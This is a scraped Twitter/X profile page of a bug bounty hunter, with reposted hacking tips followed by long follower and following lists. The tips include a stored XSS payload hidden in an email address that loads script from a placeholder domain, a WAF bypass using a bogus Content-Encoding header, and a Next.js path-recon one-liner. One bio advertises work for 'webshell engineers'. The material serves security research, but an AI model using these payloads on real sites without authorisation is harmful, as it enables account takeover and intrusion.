luffydragneel @Hackers_Guild
A full-time hacker + otaku. Level 5 SRT member. For any freelance pentest projects or invite to a private BB program, feel free to DM here :) luffydragneel.blogspot.com Raftel Joined December 2017-
Tweets2K
-
Followers2K
-
Following277
-
Likes7K
Use NextJS? Recon Tip by renniepak A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); #infosec #cybersec #bugbountytips
I have finally been recognized as an SRT legend. 😎Check my Acropolis profile here acropolis.synack.com/inductees/luff…. Thanks @SynackRedTeam for the amazing opportunity. #bugbounty
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
Mad props to @rafabyte_'s debut security research on "Exploiting HTTP Parsers Inconsistencies" explaining how to bypass Nginx ACL Rules with Node.js, Flask and Spring Boot. Here's a 4 step guide based on his 5 months of research on how to exploit this.
I recently came across a weird case of cache deception vulnerability on a @SynackRedTeam target. I'm very excited to share the details with y'all. Also, I'm trying a new blog format this time. I hope you folks like it. Here you go: kuldeep.io/posts/web-cach…
The new Cookieless variant (CVE-2023-36560) has been added to soroush.me/blog/2023/08/c… @mwulftange 😇
Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀 Here's a valuable list of sources to track all bug bounty platforms and assets: 1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 github.com/projectdiscove… 2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 github.com/arkadiyt/bount… 3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 github.com/sw33tLie/bbsco… What can you do with this data? Here are some ideas: 1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email. 2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks. 3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates. 🕵️♂️ Follow these accounts for real-time scope updates: 1️⃣ h1disclosed - Twitter: 🔗 x.com/disclosedh1 - Get notifications on program launches and disclosed reports. 2️⃣ bbradar - Track all bug bounty programs at: 🔗 bbradar.io 3️⃣ inbbupdates - Twitter: 🔗 x.com/inbbupdates - Receive notifications on scope changes. This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒 #hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡
Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️♂️💻 1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.
Zendesk Takeover for fun and profit 😇 0xprial.com/the-art-of-zen… #BugBounty #BugBountyTips #TogetherWeHitHarder
#0day #research #bugbounty #informationsecurity blog.malicious.group/from-akamai-to… How I *AM* able to abuse Akamai to abuse F5, to abuse all of their customers. This is a bug chain that doesn't require a bug on the target domain to exploit them. But what do I know, I am a freelance nobody.
A very good writeup:- medium.com/@bug4y0u/how-i…
@asad0x01 @monkehack @kingcoolvikas @jayesh25 Working now 😊
@monkehack @kingcoolvikas @jayesh25 Is the link working for you?
@jayesh25 @pikaso_me screenshot this
🕵️♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
Very nice 🙏
This post is for all beginners who are stuck after solving @PortSwigger Academy. So i have just created a list (@hackthebox_eu )which u can refer & follow after you are done with your basics from @PortSwigger & @PentesterLab . docs.google.com/spreadsheets/d…
You must sleep with this under your pillow to become good at web security: github.com/OWASP/wstg/rel…
301party.com: the intentionally open redirect #bugbountytip
@therceman Can you explain how it will help? I don't think it will help as the waf will still block it
Harsh Bothra @harshbothra_
43K Followers 755 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
Masonhck357 @Masonhck3571
16K Followers 820 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe. opinions are that of my own
Tuan Anh Nguyen⚡️... @haxor31337
16K Followers 2K Following 30 y/o Bug Bounty Hunter and Red Team Lead at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @Bugcrowd
Ananda Dhakal @dhakal_ananda
11K Followers 734 Following Vulnerability Researcher @patchstackapp | Brand Ambassador @Hacker0x01 | Blogs: https://t.co/a0aOojdwyl 🇳🇵
Md Ismail Šojal �... @0x0SojalSec
46K Followers 5K Following Cyber_Security_Re-searcher || Ai Re-searcher || AI-Sec|| Malware Analysis II iOS || Pwn || 0SINT || Project AI-StrikeSec || 0ldAccounts Suspended @0xSojalSec ||
Cinna_Bunna @BunnaCinna22581
6 Followers 41 Following This is the backup account of @TamarisLittle ! Age: 23!
⏔⏔⏔ ꒰ ᧔ෆ�... @TamarisLittle
29 Followers 203 Following HII i might not be on twitter alot Age:🍓23🍓 my new account is: @BunnaCinna22581 I'm working on it a bit
KA @MHMMD_KLC
129 Followers 286 Following Siber barışçı \n Offensive blog: https://t.co/w9HUfQDL4v, Defensive blog https://t.co/fde0yxtQQX, Telegram Kanalı:
𝓡𝓘𝓢𝓚. @Risk7_
0 Followers 69 Following About me?: I am someone play chess against him/herself consistently | شخص ساخط جدًا يواجه واقعه بالسخرية واللامبالاة.
Abh1sh3k @Abh1s3c
110 Followers 626 Following 🐾 Security Researcher | Bug Bounty Hunter | Breaking bugs, not rules |Hunting bugs for coffee ☕ & bounties 💰
3m0n @em0n555
74 Followers 2K Following
_2051 @b8192051
11 Followers 473 Following
Frank @FrankYoumbi_
6 Followers 565 Following
Betty Mendoza @EliMarion190047
112 Followers 296 Following
Sourabh Das @SourabhDasPM
1 Followers 106 Following
Paulette May @may_paulet89131
1 Followers 171 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please c ontact https://t.co/uDYMj2xiBT
tarantularifat @tarantularifat
2 Followers 855 Following
Amirali @Amirali_Kazi
0 Followers 106 Following
Piyush Kumar @SilverPoision
449 Followers 959 Following I craft weird ASCII patterns that make the internet panic.
bir hemşire @RSonmez38208
4 Followers 159 Following
Carlos Mayorga @Sud0Chul0
537 Followers 7K Following System Administrator | Fortinet | Azure | Entra | #cybersecurity
prasamsha @prasams89
12 Followers 1K Following
sad @sec0x25
66 Followers 3K Following
CyberRam @rnikadi001
4 Followers 294 Following
Vishal Gupta 🇮🇳 @HackerxTommy
137 Followers 4K Following •HACKER •Security Resercher @Hacker0x01 & @Bugcrowd •Bug Bounty Hunter #Ittakesacrowd #Wearehackerone
bugsploiterr @systempwn3d
27 Followers 2K Following
nanjin002 @nanjin00272827
12 Followers 4K Following
vaibhav Patil 🇮�... @VaibhavPatil_9
3 Followers 60 Following
Muhammad Asad @Muhammad_AsadPk
92 Followers 1K Following eWPTXv3 | CRTA | CAP | SRT | VAPT | Penetration Tester | Offensive Security Engineer | Security Researcher #Alhumdulillah❤️
@tawanan90000 @tawanan90000
68 Followers 2K Following
renniepak @renniepakpur
292 Followers 305 Following
acecorvus 🇦🇷�... @acecorvus
0 Followers 63 Following
xss0r @xss0r
7K Followers 3K Following xss0r Deploying an alert box in a web app is like having a tiny pop-up comedian shout 'Surprise!' whenever you least expect it! #xss0r #ibrahimXSS #Blindxss0r
Cybertection LLC (Jos... @Cybertection
438 Followers 7K Following Cybertection is your choice for all security software, but our specialty is always going to be antivirus software. We are your digital bodyguard.
NetworkMapper @NetworkMapper_
0 Followers 12 Following Diving deep into the world of hacking and cybersecurity | 15 days BugBounty Challenge
冰人v @ic23a3
38 Followers 2K Following 冰人v | 专注 AI 创业与一人公司 Vive Coder & OPC Operator 「一个人 + AI = 一支军队」
Jack Daniels @JackDaniel_1337
5 Followers 299 Following
jovial @grepNstep
345 Followers 7K Following Retweet ≠ endorsement. Trust those who seek the truth, doubt those who find it
JG @JackGil49730866
45 Followers 1K Following
Akash Dubey @aakashdubey06
16 Followers 377 Following
Kienzx203 @viet_kien16450
70 Followers 3K Following
hack3r_0 @0_hack3r
937 Followers 148 Following Sr. Cybersecurity Consultant | CAPen | ISO 27001 | SC-900 | MSc CyberSec | Computer Engineer | Top #20 @Intigriti 🇪🇸
Anuj Kurkure @anuj_kurkure
41 Followers 594 Following Cyber Security Enthusiast | Bug Bounty Hunter | Learner
Luigy0x18 🇪🇦 @luigy0x18
511 Followers 2K Following Security Pentester, Thread hunter, 🟣Team, sometimes developer and many other things. CEH|CRTP|AWS CCP
Intigriti @intigriti
211K Followers 668 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Sam Curry @samwcyo
101K Followers 1K Following
bugcrowd @Bugcrowd
200K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
Ben Sadeghipour @NahamSec
248K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Yassine Aboukir 🐐 @Yassineaboukir
33K Followers 414 Following HackerOne Top 40, Elite, Pentest Lead, Ambassador, x2 MVH Title, $1 million bounties and ex- Hacker Advisory Board • Digital Nomad/Hybrid Athlete/Surfer
zseano @zseano
81K Followers 712 Following #1 Amazon Hacker. rebuilding bugbountyhunter and making bug bounties a better place for hackers. lover of hackbots
shubs @infosec_au
59K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
Julien | MrTuxracer �... @MrTuxracer
39K Followers 441 Following Founder of @rcesecurity | #BugBounty | @Hacker0x01 MVH && H1-Elite | $1,5+ Mio in Bounties | Mobile Hacker | @[email protected]
Luke Stephens (hakluk... @hakluke
100K Followers 2K Following Hacker, marketer. I manage socials and marketing for cybersecurity orgs. Founder of @hacker_content and @haksecio
Harsh Bothra @harshbothra_
43K Followers 755 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
MorningStar @0xMstar
20K Followers 1K Following security researcher , bug bounty hunter ,bugcrowd top 10, co-founder https://t.co/1bT321Ayen, https://t.co/WqLPzN7PyL
HackerOne @Hacker0x01
338K Followers 3K Following HackerOne makes security continuous. We unite AI and human insight through a unified platform to expose risk and eliminate it.
Masonhck357 @Masonhck3571
16K Followers 820 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe. opinions are that of my own
Harsh Jaiswal @rootxharsh
22K Followers 1K Following Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryio
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Busra @turakbusra
2K Followers 482 Following Independent Security Researcher | Bug Bounty Hunter | @SynackRedTeam 👩🏼💻
sudi @sudhanshur705
6K Followers 814 Following If there's non zero chance, the effort is infinite, anything is possible
Blaklis @Blaklis_
12K Followers 80 Following Security researcher - my researchs will be on https://t.co/2PnyCvqAIm Mostly inactive, soon replicated from BSKY.
Sharik Khan @4non_Hunter
4K Followers 349 Following A Proud INDIAN 🇮🇳 | Founder @bsidesmussoorie | Bugcrowd Ambassador | Application Security Researcher @bugcrowd | Full time Bug Bounty Hunter |
Bug Bounty Insights �... @bbr_bug
5K Followers 27 Following Cybersecurity learning content. AI-assisted, expert-guided. Some posts are hypothetical for engagement. No bounties claimed, no spam.
elSec @adrielsec
4K Followers 390 Following 🧑💻🇧🇷 Author of 0 books, Cybersec Specialist at Undisclosed Companies and Security Researcher at @intigriti
Microsoft Security Re... @msftsecresponse
145K Followers 213 Following We are the Microsoft Security Response Center. To report security vulnerabilities or abuse in Microsoft products, visit https://t.co/kxEbdfMny1.
Awesome Google VRP Wr... @gvrp_writeups
3K Followers 0 Following Automatically tweeting new writeups from the GitHub repository "awesome-google-vrp-writeups".
Whispersmith @Whispersmith_n
1K Followers 0 Following Notify You About any update in tech field around the world
Jayesh Madnani @Jayesh25
14K Followers 505 Following Researcher in charge @ Ethical InfoSec Services | HackerOne Top 10 | https://t.co/JSX03Wv1vl
InfoSec Community @InfoSecComm
56K Followers 636 Following Largest InfoSec publication with 80,000+ followers and 3M+ monthly views.
H1 Disclosed - Public... @h1Disclosed
10K Followers 2 Following User friendly unofficial HackerOne public disclosures, keeps you updated about the recently disclosed bugs. Made With ♥ By Hackers For Hackers. - @rynosec
Critical Thinking - B... @ctbbpodcast
26K Followers 87 Following A 'by Hackers for Hackers' podcast focused on technical bug bounty content. Exploits, techniques, stories, bounties. Hosts: @rhynorater, @rez0__, @gr3pme
Emilien Socchi @emiliensocchi
746 Followers 134 Following Passionate security researcher and professional #EntraID #Azure #GCP #Kubernetes | Sharing technical tips and ideas
ReconOne @ReconOne_bk
21K Followers 54 Following Tweet about Bug Bounty, Recon, Recon Tips and Attack Surface Management.
Mehdi @silentgh00st
6K Followers 2K Following 🔎 Founder @mapperplus 🥷 Cyber Security Engineer 💻 Enthusiast ... --------------- OSCP-CRTO
0xor0ne @0xor0ne
92K Followers 508 Following Cybersecurity | Reverse Engineering | Vulnerability Research | Embedded & Silicon Security | My Tweets, My Opinions :)
A SLICE OF HISTORY @asIiceofhistory
310K Followers 10K Following The more you learn the more you realize how little you know🌻
Syed Mushfik Hasan Ta... @SMHTahsin33
5K Followers 352 Following Cyber Security Enthusiast | Learner | Free Time Bug Bounty Hunter | Ambitious | eWPTX, CRTO, ASCP | 21 Y/O | @bbcbd_official🇧🇩
Sivakumar @ladecruze
181 Followers 676 Following
Lucas Noki @0xPrototype
744 Followers 341 Following Welcome to the hot mess express🔥 Don't take anything you see around here too serious🎶 bbhunter-zprototype^
jkana101 @jkana101
2K Followers 454 Following Bug hunter | SRT | OSCP | CRTO | OSWE | OSEP | OSED | OSCE3
pry0cc @pry0cc
29K Followers 1K Following
Six2dez 🇵🇸 @Six2dez1
11K Followers 682 Following Bash lover | https://t.co/UoQ57OTS7f | reconFTW | RT lead @visma
Mustafa Can İPEKÇİ @mcipekci
9K Followers 489 Following I'm an engineer from Turkey, who is interested with biotechnology, computer science and digital gaming. Proud father of three little devils. A.K.A nukedx
Synack Red Team @SynackRedTeam
49K Followers 616 Following The power behind the @Synack platform is an elite team of the world's top cybersecurity researchers. Our best are honored at https://t.co/6bEAyp7HWJ
YesWeHack ⠵ @yeswehack
42K Followers 3K Following Offensive Security & Exposure Management Platform 🎯 https://t.co/57gODBqAMx 👾 https://t.co/ICc6RyihIX 💡 https://t.co/KNYxhkL2p1
Kuldeep Pandya @kuldeepdotexe
5K Followers 357 Following OSINT | Web | Binary | [email protected] | @SynackRedTeam Envoy && Hero
sellvamanoj @Tink2hack
673 Followers 2K Following Founder | CISO | SRT member | Yogosha member | OSCP | OSWP | ejPT | eWPT | eWPTx | CEH
RogueSMG @RogueSMG
9K Followers 1K Following Co-Founder @BarracksArmy | https://t.co/XXbeeUJ0Ht | Hacker Wannabe👨💻 | Ex-Null Ahmedabad Chapter Lead | SRT Top 200 | YouTube: https://t.co/HukfUSEvu2
Youstin @iustinBB
4K Followers 349 Following Bug Bounty https://t.co/zHVPVuGKCf https://t.co/yOdrIW1G71
Hannan Haseeb @HannanHaseeb11
1K Followers 870 Following Pentester @SecWallOfficial | Top 50 @YesWeHack | @SynackRedTeam Acropolis
Nikhil Mittal @nikhil_mitt
20K Followers 439 Following Hacker, Infosec Researcher, Military Affairs & History, PowerShell, AD and Azure pwner, Creator of Nishang and others :) Founder @alteredsecurity
Tuhin Bose @tuhin1729_
3K Followers 800 Following Security Researcher @cloudsek | Ex-BugBase | Bug Bounty Hunter | Penetration Tester | Freelancer | Speaker | Blogger | Krishna's Servant
Tirtha Mandal @tirtha_mandal
4K Followers 953 Following Hack All The Things || OSWE || https://t.co/YZ2iHkL35S Opinions are my own and not the views of my employer
Saugat Pokharel @saugatscript
3K Followers 227 Following I mostly find bugs on Facebook/Instagram. Some of my findings are featured on TechCrunch, The Verge, ThreatPost, Hak5 etc. I love Physics and Elon Musk.
Jaimin J Gohel 👨�... @jaimin_gohel
1K Followers 542 Following Information Security Professional 💻 • Speaker 🎙️ • Scribbler ✍️ • CTFs 🚩
Nagli @galnagli
48K Followers 509 Following Hacker; Red Agent & Offensive AI at @wiz_io / @Google; $3,000,000 Bug Bounty Hunter and Live Hacking Events Winner.
COVID || NotApolitica... @NotApoliticalin
221 Followers 20 Following Female led youth initiative, trying to bring about change one word and action at a time.






























